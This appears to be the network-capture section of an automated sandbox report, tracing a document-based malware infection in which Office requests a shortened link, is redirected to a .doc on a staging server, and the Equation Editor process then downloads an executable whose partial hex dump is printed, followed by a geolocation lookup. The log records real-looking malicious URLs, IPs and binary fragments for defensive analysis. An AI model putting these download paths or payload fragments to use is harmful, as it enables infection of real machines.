Oct 12, 2024 16:39:44.018634081 CEST	1236	IN	Data Raw: 20 20 20 09 09 20 20 20 20 20 20 20 20 20 09 20 09 20 20 09 20 09 09 20 20 20 20 09 20 20 09 20 20 20 20 20 09 20 20 20 20 09 09 20 20 20 36 61 33 37 0a 0d 0a 0d 0d 0d 0a 0a 0a 0a 0a 0a 0d 0a 0a 0d 0d 0d 0a 0d 0a 0d 0d 0a 0d 0d 0a 0d 36 31 20 09 Data Ascii: 6a3761 602
Oct 12, 2024 16:39:44.023523092 CEST	1236	IN	Data Raw: 30 30 30 30 30 30 09 20 20 20 09 20 09 20 09 09 20 09 20 20 20 20 20 20 20 09 20 20 20 20 20 09 09 20 20 20 09 20 20 09 20 20 09 09 09 09 09 09 20 20 20 20 20 09 20 20 09 09 20 20 20 20 20 09 09 20 09 20 20 20 09 20 09 09 09 09 09 09 20 20 20 09 Data Ascii: 000000 000 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49169	104.168.7.25	80	3856	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 16:39:54.554368973 CEST	287	OUT	HEAD /xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 104.168.7.25 Content-Length: 0 Connection: Keep-Alive
Oct 12, 2024 16:39:55.030874014 CEST	322	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 14:39:54 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 10 Oct 2024 11:37:22 GMT ETag: "15a24-6241dcb39afd0" Accept-Ranges: bytes Content-Length: 88612 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49170	104.168.7.25	80	3164	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 16:39:56.306967020 CEST	316	OUT	GET /450/taskhostw.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 104.168.7.25 Connection: Keep-Alive
Oct 12, 2024 16:39:56.811646938 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 14:39:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sat, 12 Oct 2024 07:42:35 GMT ETag: "13b200-62442bf48212e" Accept-Ranges: bytes Content-Length: 1290752 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/lnk Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 92 92 52 12 fc c1 52 12 fc c1 52 12 fc c1 14 43 1d c1 50 12 fc c1 cc b2 3b c1 53 12 fc c1 5f 40 23 c1 61 12 fc c1 5f 40 1c c1 e3 12 fc c1 5f 40 1d c1 67 12 fc c1 5b 6a 7f c1 5b 12 fc c1 5b 6a 6f c1 77 12 fc c1 52 12 fd c1 72 10 fc c1 e7 8c 16 c1 02 12 fc c1 e7 8c 23 c1 53 12 fc c1 5f 40 27 c1 53 12 fc c1 52 12 6b c1 53 12 fc c1 e7 8c 22 c1 53 12 fc c1 52 69 63 68 52 12 fc c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 63 28 0a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 d0 0a 00 00 00 00 00 4a 7f 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sRRRCP;S_@#a_@_@g[j[[jowRr#S_@'SRkS"SRichRPELc(g"J@ N@@@L\|p<(0q+pH@.text. `.rdata@@.datatR@.rsrc<(p*@@.reloc0qr@@B
Oct 12, 2024 16:39:56.811671972 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: DAL7hCY:hCY9hCYhC~Y_,hCmYhC\YQchCJYSLQ@SL
Oct 12, 2024 16:39:56.811687946 CEST	1236	IN	Data Raw: 4b 14 8d 43 10 89 4d 08 89 45 0c 8b 38 0f b6 84 13 10 08 00 00 8b 09 89 4d e8 83 f8 10 0f 8f 74 a4 03 00 0f 84 4d a4 03 00 83 e8 08 74 5c 48 48 0f 84 06 a4 03 00 48 48 0f 84 b7 a3 03 00 48 48 0f 84 4c a3 03 00 8b 7d f8 ff 45 f4 8b 45 0c 8b 4d 08 Data Ascii: KCME8MtMt\HHHHHHL}EEMUEM;S\|[EMpWVE_^[]}}tWVE8t!EM9t9}ujWPVEUeSVW}3CEW](HulX
Oct 12, 2024 16:39:56.811702967 CEST	1236	IN	Data Raw: a1 03 00 83 f8 2b 0f 87 2b 01 00 00 0f 84 67 a1 03 00 83 f8 06 0f 86 79 01 00 00 83 f8 0f 0f 84 a9 00 00 00 83 f8 07 0f 84 80 01 00 00 83 f8 20 0f 85 86 00 00 00 8b c7 c1 e8 10 50 0f b7 c7 50 53 56 e8 0f f9 ff ff eb 7d ba 02 02 00 00 3b c2 77 29 Data Ascii: ++gy PPSV};w)7;vv8jWSV+KwI-I IWSPVH_^[]VX373JJ
Oct 12, 2024 16:39:56.811717987 CEST	896	IN	Data Raw: 00 00 00 0f 85 98 9e 03 00 8d 45 cc 50 ff 33 ff 15 94 f6 48 00 8b 45 d4 8b 4d cc 2b c1 8b 55 d8 89 45 f4 8b 45 d0 2b d0 89 45 e8 8d 45 e4 50 ff 36 89 55 f0 89 4d e4 ff 15 70 f6 48 00 8b 7d e4 8b c7 0f af 45 f8 8b 75 e8 8b 4d ec 99 f7 7d 10 66 89 Data Ascii: EP3HEM+UEE+EEP6UMpH}EuM}fE}fEE}fEE}fft(EfuE+;t'Ef`uE+;
Oct 12, 2024 16:39:56.811732054 CEST	1236	IN	Data Raw: 83 38 00 75 0c b9 0c 58 4c 00 e8 95 13 00 00 eb dc 8b e5 5d c2 04 00 55 8b ec 83 ec 14 8b 4d 08 a1 10 58 4c 00 53 56 57 8b 04 88 b9 b0 57 4c 00 ff 75 10 8b 18 89 5d fc e8 10 04 00 00 6a 0f 8b f0 c6 45 0b 00 ff 15 28 f5 48 00 83 7b 4c ff 8b f8 74 Data Ascii: 8uXL]UMXLSVWWLu]jE(H{Lt{L$XLKHyiwq"@$"@E{LuUj(HPu H}:ju8HjH_^[]tj"E
Oct 12, 2024 16:39:56.811747074 CEST	1236	IN	Data Raw: 00 40 88 1d bc 57 4c 00 57 83 cf ff a2 b0 57 4c 00 b9 f0 57 4c 00 a3 b4 57 4c 00 89 1d c0 57 4c 00 a3 c8 57 4c 00 89 1d d0 57 4c 00 89 1d d4 57 4c 00 89 3d d8 57 4c 00 89 1d dc 57 4c 00 89 1d e0 57 4c 00 89 1d e4 57 4c 00 88 1d e8 57 4c 00 e8 10 Data Ascii: @WLWWLWLWLWLWLWLWL=WLWLWLWLWLQj^j\|XfWL3XLHXLXLXL=XL XLH$XL(XL,XL50XL4XL8XL<XL@XL=DXL=HXL\|XLXLXL=XLfWL.
Oct 12, 2024 16:39:56.811762094 CEST	1236	IN	Data Raw: 1c 58 4c 00 83 f9 ff 74 2f 8b 55 08 8d 42 0d 83 f8 0d 77 24 a1 10 58 4c 00 ff 75 0c c1 e2 04 8b 04 88 8d 8a 5c 01 00 00 8b 00 03 c8 e8 40 56 00 00 33 c0 40 5d c2 0c 00 33 c0 eb f8 55 8b ec 51 51 83 7d 18 00 0f 85 b2 98 03 00 8b 0d 1c 58 4c 00 83 Data Ascii: XLt/UBw$XLu\@V3@]3UQQ}XLtt}XLVW}0E3@E}tMg~L}6EjPFLEu*E u'~8Y_^]3vLxFPFTU\D$SVu
Oct 12, 2024 16:39:56.811778069 CEST	1236	IN	Data Raw: 8d 49 00 06 30 40 00 e4 2f 40 00 e2 cf 43 00 2b d0 43 00 47 d0 43 00 c4 cf 43 00 06 30 40 00 00 01 01 02 02 01 01 01 06 03 06 03 06 04 06 01 06 01 06 01 06 05 06 01 55 8b ec 83 ec 40 a1 78 52 4c 00 56 33 f6 a3 04 58 4c 00 6a 0f c7 45 c4 30 00 00 Data Ascii: I0@/@C+CGCC0@U@xRLV3XLjE0E+uEEu0HEEEEEEPuEHE@$HhHfRLHXLEPEE;Hjjj!jjHh5XL\XL(HPj5
Oct 12, 2024 16:39:56.811793089 CEST	1236	IN	Data Raw: 33 c9 89 46 0c f7 e3 57 0f 90 c1 f7 d9 0b c8 51 e8 43 da 01 00 83 7e 04 00 8b f8 59 0f 85 a9 9c 03 00 89 7e 04 5f 53 e8 2c da 01 00 8b d0 59 85 d2 74 1d 8b 4d 08 8b 09 89 0a 8b 4e 08 8b 46 04 89 14 88 ff 46 08 5e 5b 5d c2 04 00 8b c1 eb b0 33 d2 Data Ascii: 3FWQC~Y~_S,YtMNFF^[]3VNVF4fFYN^$VW39~of_^VHv-Y^UQQEHPjhDHf}1]UQQ}SVtrutk33fEPj
Oct 12, 2024 16:39:56.817090034 CEST	1236	IN	Data Raw: e8 69 60 00 00 8d 4d b4 e8 61 05 00 00 83 65 a0 00 8d 4d b4 c6 45 c4 00 e8 55 06 00 00 8d 4d a4 e8 8d 20 00 00 5f 5e 5b 8b e5 5d c2 08 00 33 f6 e9 47 ff ff ff 56 57 8b 35 20 f7 48 00 33 ff 57 ff 35 78 52 4c 00 b8 00 00 00 80 57 57 6a 64 68 2c 01 Data Ascii: i`MaeMEUM _^[]3GVW5 H3W5xRLWWjdh,PPhlHPPWW5xRLRLjPWWWWhPWhHW5HW5RLRLW5RL_^U8VWj0Hhj,H5(Hjc5xRLEh5xRLRLh5xR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49173	178.237.33.50	80	3316	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 16:40:03.074881077 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Oct 12, 2024 16:40:03.717297077 CEST	1170	IN	HTTP/1.1 200 OK date: Sat, 12 Oct 2024 14:40:03 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	188.114.96.3	443	3564	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-10-12 14:39:43 UTC	321	OUT	GET /7al0eY HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: shuvi.io Connection: Keep-Alive
2024-10-12 14:39:43 UTC	997	IN	HTTP/1.1 302 Found Date: Sat, 12 Oct 2024 14:39:43 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 197 Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 0 Location: http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc Vary: Accept X-Served-By: shuvi.io cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Zix60zoPxeO4fd1q%2BwHvZqVCPX8t8z3UkBYxGC%2F3FRZ%2Fo6ZMcQLtLTi8VYiZvDPCtHrwWsogtlIKScV2O0RDuYCXGWZbf7dAizwN4sXtT9bVehT8v%2B%2FCyEEJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d17d747fdba0fa9-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 14:39:43 UTC	197	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 37 2e 32 35 2f 78 61 6d 70 70 2f 65 77 2f 77 65 63 72 65 61 74 65 64 6e 65 77 74 68 69 67 73 66 6f 72 73 75 63 63 65 73 73 66 75 6c 6c 6a 6f 75 72 6e 65 63 79 72 5f 5f 5f 5f 5f 5f 5f 5f 76 65 72 79 6e 69 63 65 70 65 6f 70 6c 65 73 65 74 69 72 65 74 68 69 67 73 74 6f 67 6f 66 6f 72 6d 65 67 72 65 61 74 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 6e 6e 69 63 77 61 79 74 6f 65 6e 74 72 65 69 74 68 69 67 6e 74 6f 63 68 61 6e 67 65 77 69 74 68 6d 65 67 72 65 61 74 2e 64 6f 63 Data Ascii: Found. Redirecting to http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	188.114.97.3	443	3856	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-10-12 14:39:45 UTC	130	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: shuvi.io Content-Length: 0 Connection: Keep-Alive
2024-10-12 14:39:45 UTC	822	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 14:39:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Allow: GET,HEAD X-Served-By: shuvi.io cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tsxXXXcwimy8HoELOnA%2FGLSYV53tIs3nGFmVgtQiC8OouafmcRl4JeC1dSjlFen5OJEdnj3aR68UwzaSjRQk7VsRukNyU2YjZ6Pr9MsZP37EgdJeBgsyJ8f%2Bvw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d17d7573a818c0f-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 14:39:45 UTC	13	IN	Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a Data Ascii: 8GET,HEAD
2024-10-12 14:39:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49164	188.114.97.3	443	3856	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-10-12 14:39:46 UTC	115	OUT	HEAD /7al0eY HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: shuvi.io
2024-10-12 14:39:46 UTC	1011	IN	HTTP/1.1 302 Found Date: Sat, 12 Oct 2024 14:39:46 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 197 Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc Vary: Accept X-Served-By: shuvi.io cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h3f71ojQqU1OIUSjOTpwbOkyFWS2oIswD2wL%2Bvywsnz%2F%2FY3xofYVhLg5S6hih1QV7viNYiNKcUs5ZaJmxf2d0J3YikDf6C%2F%2FmTlBQJ2EnCua%2Bm8sQZUL6eiwgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d17d75d6da2440b-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.22	49165	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-10-12 14:39:51 UTC	125	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: shuvi.io
2024-10-12 14:39:52 UTC	822	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 14:39:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Allow: GET,HEAD X-Served-By: shuvi.io cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yngd6dG6rCY42zxEoDdakslqubqT49uo039gVW2igAYkOSTSlh6O2EDxVwVCTgC30iz6fUwkv9UUMUoauid39r%2BMNokvvHaE%2BcEpuSFRrg3E9AiqdAuWyyabNQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d17d77e2a7842dd-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 14:39:52 UTC	13	IN	Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a Data Ascii: 8GET,HEAD
2024-10-12 14:39:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.22	49166	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-10-12 14:39:52 UTC	155	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 68 75 76 69 2e 69 6f 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: shuvi.io
2024-10-12 14:39:53 UTC	865	IN	HTTP/1.1 404 Not Found Date: Sat, 12 Oct 2024 14:39:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'none' cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xO4ATnQxDN%2BDV0YZuunCA%2FhxvL2CaMYEb%2FbIsx9FPhUrgcadwm54XkljDBar%2FQAu8GSSK%2F3VzYN9Yk1FdWDx1PX%2FXAlrGtOQvJ5l7zaMYaeWvOAXNlxRYdcnsg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d17d783e86a8c78-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 14:39:53 UTC	149	IN	Data Raw: 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 8f<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
2024-10-12 14:39:53 UTC	6	IN	Data Raw: 31 0d 0a 0a 0d 0a Data Ascii: 1
2024-10-12 14:39:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.22	49167	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-10-12 14:39:53 UTC	155	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 68 75 76 69 2e 69 6f 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: shuvi.io
2024-10-12 14:39:53 UTC	859	IN	HTTP/1.1 404 Not Found Date: Sat, 12 Oct 2024 14:39:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'none' cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DZpCVrwdCNlWEoQRZ%2FY3LEkoby9aATkpRrr7nvCgyBAOLz4X41VrKXClFhkBVvOS6B4XRkmw4TMhz9K5cAeOc%2FeouvVH3rgdKIP%2BamcwTOK37kHhHXGVLGFmWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d17d7885e8541ad-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 14:39:53 UTC	149	IN	Data Raw: 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 8f<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
2024-10-12 14:39:53 UTC	6	IN	Data Raw: 31 0d 0a 0a 0d 0a Data Ascii: 1
2024-10-12 14:39:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49168	188.114.97.3	443	3856	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-10-12 14:39:54 UTC	134	OUT	HEAD /7al0eY HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: shuvi.io Content-Length: 0 Connection: Keep-Alive
2024-10-12 14:39:54 UTC	1011	IN	HTTP/1.1 302 Found Date: Sat, 12 Oct 2024 14:39:54 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 197 Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc Vary: Accept X-Served-By: shuvi.io cf-cache-status: DYNAMIC Report-To: 